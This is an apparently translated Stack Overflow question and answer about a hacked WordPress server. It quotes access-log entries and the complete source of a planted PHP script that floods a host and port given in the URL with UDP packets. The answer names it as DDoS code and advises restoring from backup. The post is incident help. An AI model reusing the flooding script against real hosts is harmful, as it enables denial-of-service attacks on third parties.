我遇到了一个大问题,有人未经我的许可就在我的网站根目录上传文件。我已经尝试过
- 封锁 IP,更新 WordPress (4.1.1)
- 添加一个插件,例如更好的 wp 安全性并正确配置它
- 删除了他上传的每个文件,但我仍然每小时收到数百个文件,这可能是什么。日志如下所示:
- 将公共(public) ftp 的权限更改为 750。
这是日志
112.6.228.87 - - [13/Apr/2015:13:40:13 +0100] "GET /ctioVp.php?host=37.157.198.94&port=8888&time=90&rat=0&len=65536 HTTP/1.1" 404 10352 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
61.152.102.40 - - [13/Apr/2015:13:40:19 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.0" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/6204-imvh.html HTTP/1.1" 200 12107 "http://.co.uk/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
95.158.139.48 - - [13/Apr/2015:13:40:43 +0100] "GET /aaadqm/9970-ywek.html HTTP/1.1" 200 12347 "http://.co.uk/aaadqm/6204-imvh.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5"
还有更多的 IP(静态)以及更多的文件和文件夹。我自己托管网站并拥有 WHM 和 Cpanel。
ctioVp.php 看起来像这样:
set_time_limit(999999);
$host = $_GET['host'];
$port = $_GET['port'];
$exec_time = $_GET['time'];
$Sendlen = $_GET['len'];
ignore_user_abort(True);
if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0)
{
if (StrLen($_GET['rat'])<>0)
{
echo php_uname();
exit;
}
exit;
}
for($i=0; $i < $Sendlen; $i++)
{
$out .= "A";
}
$max_time = time() + $exec_time;
while(1)
{
if(time() > $max_time)
{
break;
}
$fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);
if($fp)
{
fwrite($fp, $out);
fclose($fp);
}
}
其余文件都是带有中文内容的html文件。
最佳答案
您发布的脚本用于使用 UDP 包(又名 DDOS)淹没给定服务器。
受感染的服务器的问题是您不知道攻击者做了什么。也许他安装了 root 工具包或类似的东西。
从此恢复的唯一安全方法是使服务器脱机,并使用未受损的备份重新开始。
另请参阅https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server
关于php - WordPress 网站或服务器因上传大量 php 和 html 文件而遭到黑客攻击,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/29679412/